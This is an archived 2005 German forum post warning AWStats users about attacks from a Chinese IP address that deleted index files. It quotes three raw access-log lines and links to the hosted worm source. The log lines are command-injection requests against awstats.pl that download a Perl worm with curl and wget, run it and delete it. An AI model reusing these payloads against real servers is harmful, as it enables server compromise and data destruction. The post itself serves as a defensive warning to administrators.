Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Hinweis: Hackversuche für AWSTATS

Alles zum Thema: Robots, Spider, Logfile-Auswertung und Reports
Neues Thema Antworten
Pompom
PostRank 10
PostRank 10
Beiträge: 3751
Registriert: 10.09.2004, 16:38

Beitrag von Pompom » 09.03.2005, 10:52

Wir haben in den letzten Tagen vermehrt Zugriffe aus China von der IP: 61.135.136.137

Die von euch, die Awstats nutzen, sollten sich das genauer ansehen, denn plötzlich sind alle Index-Dateien wech.

Den Wurm gibt es als Quelltext derzeit unter:
https://www.krazyk9s.co.uk/spykids.txt


Logauszug:

61.135.136.137 - - [08/Mar/2005:23:24:29 +0100] "GET /awstats/awstats.pl%20target=_blan?configdir=%7Cecho%20;cd%20/tmp;curl%20-O%20www.krazyk9s.co.uk/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids.txt;%20wget%20www.krazyk9s.co.uk/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids.txt;echo%20;echo%7C HTTP/1.0" -" "LWP::Simple/5.53"
61.135.136.137 - - [08/Mar/2005:23:24:33 +0100] "GET /awstats/awstats.pl%20target=_blan?update=1&logfile=%7Cecho%20;cd%20/tmp;curl%20-O%20www.krazyk9s.co.uk/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids.txt;%20wget%20www.krazyk9s.co.uk/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids.txt;echo%20;echo%7C HTTP/1.0" - "LWP::Simple/5.53"
61.135.136.137 - - [08/Mar/2005:23:24:39 +0100] "GET /awstats/awstats.pl%20target=_blan?pluginmode=:system(%22cd%20/tmp;curl%20-O%20www.krazyk9s.co.uk/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids.txt;%20wget%20www.krazyk9s.co.uk/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids.txt%22); HTTP/1.0" -" "LWP::Simple/5.53"